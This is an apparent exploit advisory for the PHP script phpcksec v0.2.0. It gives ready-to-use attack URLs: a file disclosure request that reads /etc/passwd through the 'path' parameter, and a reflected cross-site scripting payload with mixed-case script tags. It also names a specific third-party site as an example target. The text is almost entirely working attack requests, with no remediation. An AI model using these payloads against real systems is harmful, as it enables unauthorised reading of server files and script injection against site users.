phpcksec version 0.2.0 suffers from cross site scripting and file disclosure vulnerabilities.
6c2f9bb5fcf5ffb83d472e37eddddb953f2b6cc48e33a2b6f60edd0126641ebc
........
(XSS / FD Vulnerability)
----------------------------------
script:phpcksec v0.2.0
***************************************************
download from:http://www.ott.net/software/phpcksec/
***************************************************
........................................................
http://www.site.com/path/phpcksec.php?path=/etc/passwd
xss:
http://www.site.com/path/phpcksec.php?path=>\'><ScRiPt >alert(0);</ScRiPt>
***************************************************
***************************************************
Author: ahmadbady
---------------------
EXAMPLE:http://nerdbynature.de/bits/phpcksec/phpcksec.php?path=/etc/passwd